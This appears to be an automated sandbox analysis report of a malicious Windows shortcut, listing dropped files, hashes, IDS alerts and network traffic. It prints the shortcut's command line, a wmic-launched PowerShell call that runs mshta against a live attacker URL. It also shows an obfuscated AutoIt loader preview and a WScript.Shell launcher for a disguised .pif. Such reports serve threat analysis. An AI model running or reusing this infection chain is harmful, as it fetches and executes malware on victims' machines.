                                                                                                                  Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):29752
                                                                                                                  Entropy (8bit):5.397141561848925
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbP:7
                                                                                                                  MD5:AF650DC134AEEC0EE5E20D34B37A8F66
                                                                                                                  SHA1:D42C7C42C9A20772BAC0D41D792854C0FD6BF70E
                                                                                                                  SHA-256:CB8661A42705DD5F4BD26B229EFB62974C38AD36DCE8816ABD3E0201BE2EB259
                                                                                                                  SHA-512:D32CD6C1F4EB38595696C2984399F7F920A8D9C235EEC880C4194E2EA3C90A7A25FB2247572E385D778520F39DC92ED7B3E82437AF5F6CE88878AA773D9B056B
                                                                                                                  Malicious:false
                                                                                                                  Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                  File Type:ASCII text, with very long lines (1266)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1151620
                                                                                                                  Entropy (8bit):5.19847743673391
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:D8V+jcfSygd6pMMrD3UYhU1FPCuY23OvAnzz/v3ptwcd:DcyUpMuePTX5VtwC
                                                                                                                  MD5:1B839E7A6F23E34ACE5BC4D3C01081FB
                                                                                                                  SHA1:FED9871AD44FED784E0A39F8FDCBDDC80E55127A
                                                                                                                  SHA-256:467611EA7F5603E8233FB254AE22C63CB3FADE5B0626379DD5CF394294205C39
                                                                                                                  SHA-512:4C4CB23B2E94D5F97BF6D33DB1F4FE385F1057C9227F2C195EBF8C39CA76E439C0A63C8B997BC12652D512D1F888DF2030FC3CBD43A68E678B11DC0DE2439F8F
                                                                                                                  Malicious:false
                                                                                                                  Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):186
                                                                                                                  Entropy (8bit):4.7401751318145395
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:RiMIpGXfeNH5E5wWAX+aJp6/h4EkD5yKXW/Zi+0/RaMl85uWAX+aJp6/h4EkD5yn:RiJbNHCwWDaJ0/hJkDrXW/Zz0tl8wWDH
                                                                                                                  MD5:633E34C077F6828A474217CE7DE57BED
                                                                                                                  SHA1:6C7EF480F22DE38D9EDF82EF35C4F5943540E164
                                                                                                                  SHA-256:FE9F225D70AC67046F622C2F52E17CB8CEDD111F51AEAA17C5ADBE48846E21AF
                                                                                                                  SHA-512:358C0EBBA88DA82FCDDE3D1C518C559DADBA02E7D5935A5D12BBC5D1463A8BA094FC2AD186CDE82316010E1C4C5E18C2314C4FED70DB433C39C8FF3015577995
                                                                                                                  Malicious:true
                                                                                                                  Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):893608
                                                                                                                  Entropy (8bit):6.62028134425878
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                  MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                  SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                  SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PDF document, version 1.6
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3438614
                                                                                                                  Entropy (8bit):7.565365361527372
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:GtZNvjFRGx8mEuSEEBWfJoGnihnR3YSnyYbAYFdhzQCnGkH:GtZJFRGxZEuSEEBE6GkR3YSnyuFsXkH
                                                                                                                  MD5:13E442980DFB1FED9EE67DD9CE5C165D
                                                                                                                  SHA1:958D4B5F59CF46E817461DD2C67CDE1106FFE508
                                                                                                                  SHA-256:3D80994983233EE77AF8200DC292C95D12AD7DF091BB3FB83DA6613CE74D6CCE
                                                                                                                  SHA-512:AE9A6CEE5FAC67C3623EC5F51FF053BA47B9B4C0F811FDDA9DF290AF53923F3184771F31E1F62F889164508334E1C44407EBF0DC038FC116C1A7826625E0FE2F
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):99
                                                                                                                  Entropy (8bit):4.9306597478632
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5yKXW/Zi+URAAy:HRYF5yjo923yKXW/Zzyy
                                                                                                                  MD5:EF6AD112185745A629FB60A8A2678649
                                                                                                                  SHA1:500391A0E969362BFA1DFE7A116A9395E29D29DA
                                                                                                                  SHA-256:14555F0A16F710F533606B316DE7765634F60BD9FC5D1946D80EAA29104ACAF9
                                                                                                                  SHA-512:2F3E1A025E02EB111BB3E9F6E1CCEE3AD3A7A7BC90C0DF7D0C4ECD90BA7792A5D3C361113423BC9ED035FCA77EA5B9870AD1B648E1A86E717F7D29672699176D
                                                                                                                  Malicious:true
                                                                                                                  Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1083904
                                                                                                                  Entropy (8bit):6.306391209676911
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:4rORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaA1a:42EYTb8atv1orq+pEiSDTj1VyvBay
                                                                                                                  MD5:7E279E8E3DCD0BCD240E36D7317924D3
                                                                                                                  SHA1:A72FD80EB3E4181B1BF167504F6D1309693734EE
                                                                                                                  SHA-256:45DEA3D8D1370926857577932E3F296E4084282B5270E9E10FC2D43CE44FA497
                                                                                                                  SHA-512:9539256529BEA462F3105A6642BC0E9DA10C784EE17DDA3B897DFC1252A514A37A2DE9FA52804434D88DD607E6582B7680279FE3B0F2CC127E923ABF77CC5DF1
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                  Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):160
                                                                                                                  Entropy (8bit):5.095703110114614
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgmER0wFJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egmETeAc
                                                                                                                  MD5:CD2F6BF4766CC06C99DA9B40BC45CDDA
                                                                                                                  SHA1:2CF7E19309BB8AF8056A58AB20E5E8F159A008EC
                                                                                                                  SHA-256:FA58A72EEE86FE685E4EC39CF0FFC4A20FB1055B98E0A84F9491C0E582086773
                                                                                                                  SHA-512:05B7923AEB62FA464BEED20B842749192A38CB4F24959C78974EB9219457312A0135CD5C0DECADDB6F5EFACDA396AF9D3B5D403A3FBF7802DB496970BF57B323
                                                                                                                  Malicious:false
                                                                                                                  Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 4180;...ReturnValue = 0;..};....
                                                                                                                  File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                                  Entropy (8bit):2.638740361153191
                                                                                                                  TrID:
                                                                                                                  • Windows Shortcut (20020/1) 100.00%
                                                                                                                  File name:FzmtNV0vnG.lnk
                                                                                                                  File size:1'912 bytes
                                                                                                                  MD5:ac9d5bb32e4d1c1cf52bf17bfdd8cf7b
                                                                                                                  SHA1:b9c921613643e7c500783326483523e92e6ab016
                                                                                                                  SHA256:4883c36a3b5c9d4f4c318312dce1058d722e8a378adb3e348203bc93f41540d6
                                                                                                                  SHA512:bef5c40abcceb076ccbc2c707c63de6d3eb1aaa957e0c62f2fa5ef38826ff21c47eada2bb7490284a47036d1f545f9ca6fae82a5ee29dbbd0574d1d841dff7da
                                                                                                                  SSDEEP:24:8AyH/BUlgKN4ee+/31kWNdk6Zoc6gehqdd79dsrabqyI+pu:89uGep1ldkU65MdJ9Aaey3w
                                                                                                                  TLSH:BC415E041AE90B20F3B7CE72547AB721897F7C5AED728F1C018186892532A20E875F6B
                                                                                                                  Icon Hash:72d282828e8d8dd5

                                                                                                                  General

                                                                                                                  Relative Path:..\..\..\..\Windows\System32\Wbem\wmic.exe
                                                                                                                  Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')"
                                                                                                                  Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T07:11:35.553406+0100 | 2026434 | ET MALWARE VBScript Redirect Style Exe File Download | 1 | 147.45.49.155 | 443 | 192.168.2.5 | 49704 | TCP
2024-12-23T07:11:49.698928+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49714 | 147.45.49.155 | 443 | TCP
                                                                                                                  Dec 23, 2024 07:11:38.600012064 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:38.600043058 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.107587099 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.107712030 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:40.109153986 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:40.109168053 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.109419107 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.130032063 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:40.175371885 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.722207069 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.765026093 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:40.913863897 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.913882017 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.913919926 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.913939953 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.913942099 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:40.913964033 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.913980961 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.913996935 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:40.914035082 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:40.965775967 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.965801001 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.965940952 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:40.965955973 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:40.966007948 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.116097927 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.116123915 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.116218090 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.116239071 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.116290092 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.153794050 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.153821945 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.153899908 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.153917074 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.153974056 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.177717924 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.177745104 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.177819014 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.177835941 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.177911043 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.269192934 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.269203901 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.269325018 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.269341946 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.269392014 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.314610958 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.314636946 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.314707994 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.314727068 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.314779997 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.332711935 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.332727909 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.332808971 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.332822084 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.332973003 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.349292994 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.349339962 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.349371910 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.349379063 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.349415064 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.349432945 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.366585970 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.366640091 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.366677999 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.366694927 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.366712093 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.366739035 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.383239985 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.383285046 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.383330107 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.383342028 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.383362055 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.383385897 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.492244005 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.492279053 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.492331982 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.492352009 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.492382050 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.492393970 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.505908012 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.505928993 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.505981922 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.505990982 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.506035089 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.506055117 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.517055035 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.517076015 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.517131090 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.517147064 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.517189026 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.517199993 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.525226116 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.525244951 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.525295973 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.525311947 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.525345087 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.525410891 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.532361031 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.532382011 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.532433987 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.532447100 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.532480001 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.532515049 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.539864063 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.539890051 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.539949894 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.539959908 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.539988041 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.540005922 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.548142910 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.548162937 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.548211098 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.548218966 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.548258066 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.548274040 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.556031942 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.556057930 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.556099892 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.556107044 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.556148052 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.556165934 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.684535980 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.684578896 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.684616089 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.684634924 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.684674025 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.684684992 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.691530943 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.691576004 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.691617966 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.691636086 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.691668034 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.691683054 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.698744059 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.698774099 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.698820114 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.698838949 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.698869944 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.698892117 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.705619097 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.705643892 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.705732107 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.705749035 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.705769062 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.705792904 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.712976933 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.713004112 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.713044882 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.713059902 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.713090897 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.713109970 CET49708443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:41.719271898 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.719295979 CET44349708147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:41.719347000 CET49708443192.168.2.5147.45.49.155
